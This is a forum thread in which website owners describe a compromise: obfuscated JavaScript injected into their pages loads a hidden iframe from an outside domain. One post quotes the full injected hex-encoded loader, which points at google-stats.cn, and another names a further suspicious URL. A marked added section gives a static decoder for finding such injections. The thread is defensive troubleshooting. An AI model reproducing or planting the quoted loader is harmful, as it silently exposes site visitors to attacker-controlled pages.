Website accessing unknown URL
My website (PHP/MySQL) is fetching data from unknown URLs, for example google-stats.cn, googlezet.net and a few more. I did a find through the entire website folder but could not find these URLs. This seems to be very difficult to solve?
Re: Website accessing unknown URL
Thanks for your reply. At this time I am not able to reveal the URL to you due to a confidentiality agreement with my customer. If you can relate to the problem and give me information to identify and resolve the issues, it will be of great help.
This is the only site in the search where I could find some info.
http://webhelper4u.net/whmembers/sitesl ... alphaA.txt
Thank you again for your reply. I look forward to your advice.
Re: Website accessing unknown URL
This is what the code has created in an index file, but these variables are dynamic and get generated in almost any file.
<!-- o --><script type="text/javascript">function jgouxhcixerkio(gqnfvwqckkaxvgg){var xlwqrzxo="";for(mxkoehci=0;mxkoehci<gqnfvwqckkaxvgg.length;mxkoehci+=2){xlwqrzxo+=(String.fromCharCode(parseInt(gqnfvwqckkaxvgg.substr(mxkoehci,2),16)));}document.write(xlwqrzxo);}jgouxhcixerkio("3C696672wqxeru61wqxeru6Dwqxeru65wqxeru20wqxeru737263wqxeru3D22wqxeru68wqxeru747470wqxeru3Awqxeru2F2Fwqxeru676Fwqxeru6Fwqxeru67wqxeru6C652Dwqxeru73wqxeru746174732E636E2F7371wqxeru6Cwqxeru2Fwqxeru69wqxeru6Ewqxeru2Ewqxeru636769wqxeru3Fwqxeru646566wqxeru6175wqxeru6C7422wqxeru206672wqxeru61wqxeru6D65626Fwqxeru72wqxeru6465wqxeru723Dwqxeru22wqxeru30wqxeru222062wqxeru6Fwqxeru7264wqxeru65wqxeru72wqxeru3Dwqxeru2230222077wqxeru69wqxeru6474683Dwqxeru22wqxeru3022206865wqxeru69676874wqxeru3Dwqxeru22wqxeru30wqxeru22wqxeru2073wqxeru74wqxeru79wqxeru6C65wqxeru3Dwqxeru22706Fwqxeru73wqxeru6974wqxeru696Fwqxeru6E3A2061wqxeru62wqxeru736Fwqxeru6C7574653Bwqxeru20wqxeru76wqxeru6973wqxeru6962696Cwqxeru69wqxeru74wqxeru79wqxeru3A20wqxeru68wqxeru69wqxeru6464656E3Bwqxeru20wqxeru64wqxeru69wqxeru73wqxeru706Cwqxeru61wqxeru79wqxeru3A206Ewqxeru6F6E65wqxeru223E3C2Fwqxeru69wqxeru66wqxeru7261wqxeru6D653Ewqxeru".replace(/wqxeru/g, ""));</script><!-- c -->
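The snippet in the post above stores its markup as hex digits interleaved with a filler token, which is why a plain-text search of the site folder for the domain finds nothing. The following is an added example, not part of the original thread: a static decoder that recovers the hidden markup without executing it. The sample page, the filler `zqk`, the domain `bad.example` and all function names are constructed for illustration.

```javascript
// Added example: static decoder for hex-plus-filler script injections.
// Nothing from the scanned page is executed; the string is only decoded.

// Matches  "<payload>".replace(/<filler>/g, "")  as used by the injected script.
const CALL_RE = /["']([0-9A-Za-z]+)["']\s*\.replace\(\s*\/(\w+)\/g\s*,\s*["']{2}\s*\)/g;
// Pulls src/href targets out of the decoded markup.
const URL_RE = /(?:src|href)\s*=\s*["']?([^"'\s>]+)/gi;

function decodeHex(hex) {
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

function findHiddenPayloads(source) {
  const findings = [];
  for (const m of source.matchAll(CALL_RE)) {
    const hex = m[1].split(m[2]).join(""); // strip the filler token
    // Skip ordinary .replace() calls: keep only long, even-length hex strings.
    if (hex.length < 16 || hex.length % 2 !== 0 || !/^[0-9A-Fa-f]+$/.test(hex)) continue;
    const decoded = decodeHex(hex);
    findings.push({
      filler: m[2],
      decoded,
      urls: [...decoded.matchAll(URL_RE)].map((u) => u[1]),
      hiddenFrame: /<iframe/i.test(decoded) &&
        /display:\s*none|(?:width|height)=["']?0/i.test(decoded),
    });
  }
  return findings;
}

// Constructed sample page: one harmless .replace() call and one injected block
// (filler "zqk", placeholder domain bad.example, loader body elided).
const SAMPLE_PAGE =
  '<script>var t = "hello".replace(/l/g, "");</script>\n' +
  '<script>function d(s){/* hex decode + document.write */}d("' +
  "3C6966zqk72616Dzqk6520zqk737263zqk3D22zqk68747470zqk3A2F2Fzqk626164zqk2E6578" +
  "zqk616D706C65zqk2F22zqk207769647468zqk3D223022zqk20686569676874zqk3D223022" +
  "zqk3E3C2Fzqk696672616D65zqk3E" +
  '".replace(/zqk/g, ""));</script>';

console.log("plain-text search hit:", SAMPLE_PAGE.includes("bad.example"));
console.log(findHiddenPayloads(SAMPLE_PAGE));
```

Run over a local copy of each site file, any finding with `hiddenFrame` set marks a file to restore from a known-clean copy.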
Re: Website accessing unknown URL
I have experienced the same thing!
On one of my client's FTP accounts, in an index.html file, the function "function jgouxhcixerkio" was inserted
and the jpg image loaded on that page was edited with a URL to
"[http://srq3h.com/center/movies/images/luk/index.php]", which I suppose will load even more crap if you go there...
When I searched the site I found additional pages that had the
"function jgouxhcixerkio" or similar, such as function pkjrwddej(nhehhbxp) etc.
I have asked the web hotel to change the password to the FTP account,
made the index and jpg file not editable (write protected),
scanned my computer for viruses etc. and cleaned it! --> several cookies deleted.
Now I hope this will solve the problem if any 'gangster' got hold of the ftp_account login.
Has anyone else experienced this?
Re: Website accessing unknown URL
What we have done as an immediate fix is change all the common file names, e.g. index, config, login, etc. This has solved the issue, but I am not sure if this has also infected other files.
I will also change the FTP access password. How can these kinds of attacks be prevented in the future? Do you know any software which can scan the website (offline) for exploits?
Thanks Again! Great Help!
Manis
Re: Website accessing unknown URL
This sounds like a "local" problem - it happens that your machine (that is used to FTP to the site) has some malware on it, which has sniffed the FTP password and injected the code. Reupload your site from a clean machine and see if it helps.
Re: Website accessing unknown URL
This might be true. I have cleaned the system & uploaded the code again. I am waiting to see any changes.
Is there any tool/software which can manage security? Whatsoever the infection, will it clean the code locally?
Thanks!
Manis